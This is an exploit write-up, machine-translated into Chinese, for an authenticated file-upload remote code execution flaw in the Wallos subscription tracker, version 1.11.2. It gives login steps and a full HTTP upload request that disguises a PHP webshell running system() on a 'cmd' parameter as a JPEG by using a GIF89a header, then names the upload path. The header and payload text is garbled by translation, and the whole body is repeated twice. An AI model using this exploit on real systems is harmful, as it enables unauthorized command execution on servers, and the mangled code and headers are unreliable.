#利用title: wallos-文件上传RCE(身份验证)
#日期: 2024-03-04
#利用作者: [email protected]
#供应商homepage: https://github.com/ellite/wallos
#软件link: https://github.com/ellite/wallos
#版本: 1.11.2
#测试在: Debian 12
Wallos允许您在创建新订阅时上传图像/徽标。
可以绕过这可以上传恶意.php文件。
POC
---
1)登录应用程序。
2)转到“新订阅”
3)上传徽标并选择您的webshell .php
4)使请求将内容类型更改为image/jpeg并添加“ gif89a”,应该像:
---折磨-------------------------------------
post/endpoints/subscription/add.php http/1.1
HOST: 192.168.1.44
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://192.168.1.44/
content-type:多部分/form-data;边界=--------------------------------- 292514421394772609393920738324
Origin: http://192.168.1.44
内容长度: 7220
连接:关闭
cookie:主题=光;语言=en; phpsessID=6A3E5ADC1B74B0F1870BBFCEB16CDA4B;主题=光
------------------------------------------------------------ 292514421394772609393920738324
content-disposition: form-data;名称='名称'
测试
------------------------------------------------------------ 292514421394772609393920738324
content-disposition: form-data;名称='徽标'; filename='revshell.php'
content-type:图像/jpeg
GIF89A;
php
系统($ _ get ['cmd']);
?
------------------------------------------------------------ 292514421394772609393920738324
content-disposition: form-data;名称='徽标-url'
-----狙击------------------
5)您将得到您的文件上传OK:的响应
{'status':'success','Message':'subscription成功更新了'}
6)您的文件将位于:
http://Victim_ip/images/uploads/logos/
#日期: 2024-03-04
#利用作者: [email protected]
#供应商homepage: https://github.com/ellite/wallos
#软件link: https://github.com/ellite/wallos
#版本: 1.11.2
#测试在: Debian 12
Wallos允许您在创建新订阅时上传图像/徽标。
可以绕过这可以上传恶意.php文件。
POC
---
1)登录应用程序。
2)转到“新订阅”
3)上传徽标并选择您的webshell .php
4)使请求将内容类型更改为image/jpeg并添加“ gif89a”,应该像:
---折磨-------------------------------------
post/endpoints/subscription/add.php http/1.1
HOST: 192.168.1.44
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://192.168.1.44/
content-type:多部分/form-data;边界=--------------------------------- 292514421394772609393920738324
Origin: http://192.168.1.44
内容长度: 7220
连接:关闭
cookie:主题=光;语言=en; phpsessID=6A3E5ADC1B74B0F1870BBFCEB16CDA4B;主题=光
------------------------------------------------------------ 292514421394772609393920738324
content-disposition: form-data;名称='名称'
测试
------------------------------------------------------------ 292514421394772609393920738324
content-disposition: form-data;名称='徽标'; filename='revshell.php'
content-type:图像/jpeg
GIF89A;
php
系统($ _ get ['cmd']);
?
------------------------------------------------------------ 292514421394772609393920738324
content-disposition: form-data;名称='徽标-url'
-----狙击------------------
5)您将得到您的文件上传OK:的响应
{'status':'success','Message':'subscription成功更新了'}
6)您的文件将位于:
http://Victim_ip/images/uploads/logos/
